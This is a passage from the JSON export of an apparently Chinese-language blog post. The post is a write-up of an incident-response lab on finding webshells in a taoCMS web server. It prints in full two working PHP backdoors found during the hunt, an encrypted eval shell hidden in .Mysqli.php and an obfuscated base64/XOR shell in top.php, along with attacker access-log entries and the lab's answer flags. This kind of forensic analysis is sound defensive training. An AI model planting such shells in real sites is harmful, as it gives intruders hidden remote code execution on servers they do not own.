class=\"language-bash\">flag{39392de3218c333f794befef07ac9257}<\/code><\/pre>\n<h2>\u9ed1\u5ba2\u9690\u85cfshell\u7684\u5b8c\u6574\u8def\u5f84\u7684md5<\/h2>\n<p>\u8fd9\u91cc\u731c\u9690\u85cf\u5e94\u8be5\u5c31\u662f\u524d\u9762\u627e\u5230\u7684\u70b9\u5f00\u9898\u7684\u90a3\u4e2a\u6587\u4ef6\u4e86\uff0c\u4e00\u6837\u4e5f\u6709<code>eval<\/code>\u8bed\u53e5\uff1a<\/p>\n<pre><code class=\"language-bash\">root@ip-10-0-10-3:\/var\/www\/html# cd include\/Db\nroot@ip-10-0-10-3:\/var\/www\/html\/include\/Db# ls -la\ntotal 36\ndrwxr-xr-x 2 www-data www-data 4096 Aug  2  2023 .\ndrwxr-xr-x 4 www-data www-data 4096 Aug  2  2023 ..\n-rw-r--r-- 1 www-data www-data  768 Aug  2  2023 .Mysqli.php\n-rwxr-xr-x 1 www-data www-data 4752 Mar 14  2021 Mysqli.php\n-rwxr-xr-x 1 www-data www-data 4921 Mar 14  2021 Mysql.php\n-rwxr-xr-x 1 www-data www-data 4433 Mar 14  2021 Sqlite.php\nroot@ip-10-0-10-3:\/var\/www\/html\/include\/Db# ls\nMysqli.php  Mysql.php  Sqlite.php\nroot@ip-10-0-10-3:\/var\/www\/html\/include\/Db# cat .Mysqli.php<\/code><\/pre>\n<pre><code class=\"language-php\">&lt;?php\n@session_start();\n@set_time_limit(0);\n@error_reporting(0);\nfunction encode($D,$K){\n    for($i=0;$i&lt;strlen($D);$i++) {\n        $c = $K[$i+1&amp;15];\n        $D[$i] = $D[$i]^$c;\n    }\n    return $D;\n}\n$payloadName=&#039;payload&#039;;\n$key=&#039;3c6e0b8a9c15224a&#039;;\n$data=file_get_contents(&quot;php:\/\/input&quot;);\nif ($data!==false){\n    $data=encode($data,$key);\n    if (isset($_SESSION[$payloadName])){\n        $payload=encode($_SESSION[$payloadName],$key);\n        if (strpos($payload,&quot;getBasicsInfo&quot;)===false){\n            $payload=encode($payload,$key);\n        }\n                eval($payload);\n        echo encode(@run($data),$key);\n    }else{\n        if (strpos($data,&quot;getBasicsInfo&quot;)!==false){\n            $_SESSION[$payloadName]=encode($data,$key);\n        }\n    }\n}<\/code><\/pre>\n<p>\u4e5f\u662f\u4e00\u4e2a\u54e5\u65af\u62c9\u9a6c\uff0c\u67e5\u770b\u4e00\u4e0bflag\uff1a<\/p>\n<pre><code class=\"language-bash\">root@ip-10-0-10-3:\/var\/www\/html\/include\/Db# pwd\n\/var\/www\/html\/include\/Db\nroot@ip-10-0-10-3:\/var\/www\/html\/include\/Db# echo -n &quot;\/var\/www\/html\/include\/Db\/.Mysqli.php&quot; | md5sum\naebac0e58cd6c5fad1695ee4d1ac1919  -<\/code><\/pre>\n<p>flag\u5373\u4e3a\uff1a<\/p>\n<pre><code class=\"language-bash\">flag{aebac0e58cd6c5fad1695ee4d1ac1919}<\/code><\/pre>\n<h2>\u9ed1\u5ba2\u514d\u6740\u9a6c\u5b8c\u6574\u8def\u5f84<\/h2>\n<p>\u53d1\u73b0\u53ea\u5269\u4e0b\u4e00\u4e2a\u4e86\uff0c\u53bb\u7785\u7785\u662f\u4e0d\u662f\u8fd9\u4e2a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406131812886.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406131812886.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240613175439848\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">&lt;?php\n\n$key = &quot;password&quot;;\n\n\/\/ERsDHgEUC1hI\n$fun = base64_decode($_GET[&#039;func&#039;]);\nfor($i=0;$i&lt;strlen($fun);$i++){\n    $fun[$i] = $fun[$i]^$key[$i+1&amp;7];\n}\n$a = &quot;a&quot;;\n$s = &quot;s&quot;;\n$c=$a.$s.$_GET[&quot;func2&quot;];\n$c($fun);<\/code><\/pre>\n<p>\u53d1\u73b0\u8fdb\u884c\u4e86\u4e00\u4e2abase64\u7f16\u7801\u8fdb\u884c\u514d\u6740\u7684\uff0c\u90a3\u4e48\u8fd9\u91cc\u7684\u5b8c\u6574\u5730\u5740\u5c31\u5e94\u8be5\u662f<code>\/var\/www\/html\/wap\/top.php<\/code>\uff0c\u5176flag\u5e94\u8be5\u4e3a\uff1a<\/p>\n<pre><code class=\"language-bash\">flag{EEFF2EABFD9B7A6D26FC1A53D3F7D1DE}<\/code><\/pre>\n<p>\u4e5f\u770b\u5230<a href=\"https:\/\/blog.gddfeng.com\/%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0\/%E7%8E%84%E6%9C%BA\/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94\/%E7%AC%AC%E4%B8%80%E7%AB%A0\/%E7%AC%AC%E4%B8%80%E7%AB%A0-%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-webshell%E6%9F%A5%E6%9D%80\/\">gddfeng\u5e08\u5085<\/a>\u67e5\u770b<code>access.log<\/code>\u65e5\u5fd7\u53d1\u73b0\u4e86\u6709\u6267\u884c\u8bb0\u5f55\uff0c\u8fd9\u4e5f\u662f\u4e00\u4e2a\u53d1\u73b0\u601d\u8def\uff1a<\/p>\n<pre><code class=\"language-bash\">192.168.200.2 - - [02\/Aug\/2023:08:55:49 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 26120 &quot;-&quot; &quot;Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko\/20100101 Firefox\/24.0&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:55:49 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 26230 &quot;-&quot; &quot;Mozilla\/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit\/533.20.25 (KHTML, like Gecko) Version\/5.0.3 Safari\/533.19.4&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:55:49 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 26154 &quot;-&quot; &quot;Mozilla\/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit\/533.20.25 (KHTML, like Gecko) Version\/5.0.4 Safari\/533.20.27&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:55:49 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 26171 &quot;-&quot; &quot;Mozilla\/5.0 (Windows NT 5.1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/35.0.3319.102 Safari\/537.36&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:56:10 +0000] &quot;GET \/wap\/top.php?fuc=ERsDHgEUC1hI&amp;func2=ser HTTP\/1.1&quot; 500 185 &quot;-&quot; &quot;Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:56:24 +0000] &quot;GET \/wap\/top.php?fuc=ERsDHgEUC1hI&amp;func2=sert HTTP\/1.1&quot; 200 203 &quot;-&quot; &quot;Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:56:29 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 26126 &quot;-&quot; &quot;Mozilla\/5.0 (Windows NT 6.1; Win64; x64; rv:16.0.1) Gecko\/20121011 Firefox\/21.0.1&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:56:29 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 26154 &quot;-&quot; &quot;Mozilla\/5.0 (Windows NT 6.2; rv:22.0) Gecko\/20130405 Firefox\/23.0&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:56:36 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 27109 &quot;-&quot; &quot;Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident\/5.0; chromeframe\/12.0.742.112)&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:56:38 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 27053 &quot;-&quot; &quot;Mozilla\/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit\/533.20.25 (KHTML, like Gecko) Version\/5.0.3 Safari\/533.19.4&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:56:39 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 27028 &quot;-&quot; &quot;Mozilla\/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident\/7.0;  rv:11.0) like Gecko&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:56:39 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 27080 &quot;-&quot; &quot;Opera\/12.0(Windows NT 5.1;U;en)Presto\/22.9.168 Version\/12.00&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:56:42 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 27017 &quot;-&quot; &quot;Mozilla\/5.0 (Windows NT 6.2; rv:22.0) Gecko\/20130405 Firefox\/23.0&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:56:42 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 27032 &quot;-&quot; &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:28.0) Gecko\/20100101  Firefox\/28.0&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:56:49 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 27164 &quot;-&quot; &quot;Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko\/20130331 Firefox\/21.0&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:56:53 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 27193 &quot;-&quot; &quot;Mozilla\/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit\/533.20.25 (KHTML, like Gecko) Version\/5.0.4 Safari\/533.20.27&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:57:25 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 26078 &quot;-&quot; &quot;Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/4.0; GTB7.4; InfoPath.1; SV1; .NET CLR 2.8.52393; WOW64; en-US)&quot;\n192.168.200.2 - - [02\/Aug\/2023:08:59:28 +0000] &quot;POST \/shell.php HTTP\/1.1&quot; 200 26438 &quot;-&quot; &quot;Mozilla\/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; ja-jp) AppleWebKit\/533.20.25 (KHTML, like Gecko) Version\/5.0.4 Safari\/533.20.27&quot;<\/code><\/pre>\n<p>\u8fd9\u662f\u968f\u4fbf\u622a\u53d6\u7684\u4e00\u70b9\uff0c\u8fdb\u884c\u7b80\u5355\u5904\u7406\uff1a<\/p>\n<pre><code class=\"language-bash\">root@ip-10-0-10-1:\/var\/log\/apache2# cat access.log | awk &#039;{print $7}&#039; | sort | uniq\n\/\n\/1.php\n\/admin\n\/admin\/\n\/admin\/admin.php\n\/admin\/admin.php?action=admin&amp;ctrl=lists\n\/admin\/admin.php?action=comment&amp;ctrl=lists\n\/admin\/admin.php?action=file&amp;ctrl=edit&amp;path=.\/shell.php\n\/admin\/admin.php?action=file&amp;ctrl=edit&amp;path=shell.php\n\/admin\/admin.php?action=file&amp;ctrl=lists\n\/admin\/admin.php?action=file&amp;ctrl=lists&amp;path=.\n\/admin\/admin.php?action=frame&amp;ctrl=iframes\n\/admin\/admin.php?action=frame&amp;ctrl=login\n\/admin\/admin.php?action=frame&amp;ctrl=main\n\/admin\/admin.php?action=frame&amp;ctrl=menu\n\/admin\/admin.php?action=frame&amp;ctrl=top\n\/admin\/admin.php?action=link&amp;ctrl=lists\n\/admin\/admin.php?action=sql&amp;ctrl=display\n\/admin\/admin.php?path=&amp;action=file&amp;ctrl=create&amp;isdir=0&amp;name=&amp;fbtn=%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6\n\/admin\/admin.php?path=&amp;action=file&amp;ctrl=create&amp;isdir=0&amp;name=shell.php&amp;fbtn=%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6\n\/adminer.php\n\/adminer.php?file=default.css&amp;version=4.7.2\n\/adminer.php?file=favicon.ico&amp;version=4.7.2\n\/adminer.php?file=functions.js&amp;version=4.7.2\n\/adminer.php?file=jush.js&amp;version=4.7.2\n\/adminer.php?script=version\n\/adminer.php?username=root\n\/adminer.php?username=root&amp;db=mysql\n\/adminer.php?username=root&amp;db=mysql&amp;script=db\n\/admin\/template\/images\/common.css\n\/admin\/template\/images\/common.js\n\/admin\/template\/images\/mainnavbg.gif\n\/admin\/template\/images\/sub_arrow.gif\n\/admin\/template\/images\/tinyeditor.js\n\/api.php?action=comment&amp;ctrl=code\n\/?cat=1\n\/data\/tplcache\/top.php\n\/data\/tplcache\/top.php?1=phpinfo();\n\/\/favicon.ico\n\/favicon.ico\n\/?id=1\n\/install.php\n\/shell.php\n\/template\/taoCMS\/images\/addthis.gif\n\/template\/taoCMS\/images\/dot.gif\n\/template\/taoCMS\/images\/logo.gif\n\/template\/taoCMS\/images\/style.css\n\/template\/taoCMS\/images\/tao.js\n\/template\/taoCMS\/images\/tip.gif\n\/wap\/index.php?1=phpinfo();\n\/wap\/template\/images\/logo.gif\n\/wap\/template\/images\/mobile.css\n\/wap\/template\/images\/time.gif\n\/wap\/top.php?1=phpinfo();\n\/wap\/top.php?fuc=ERsDHgEUC1hI&amp;func2=ser\n\/wap\/top.php?fuc=ERsDHgEUC1hI&amp;func2=sert<\/code><\/pre>\n<p>\u540c\u6837\u627e\u5230\u4e86\u514d\u6740\u9a6c\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u7b2c\u4e00\u7ae0 \u5e94\u6025\u54cd\u5e94-webshell\u67e5\u6740 \u67e5\u770b\u57fa\u7840\u4fe1\u606f root@ip-10-0-10-3:~# whoami; [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-689","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/689","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=689"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/689\/revisions"}],"predecessor-version":[{"id":690,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/689\/revisions\/690"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=689"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=689"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=689"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}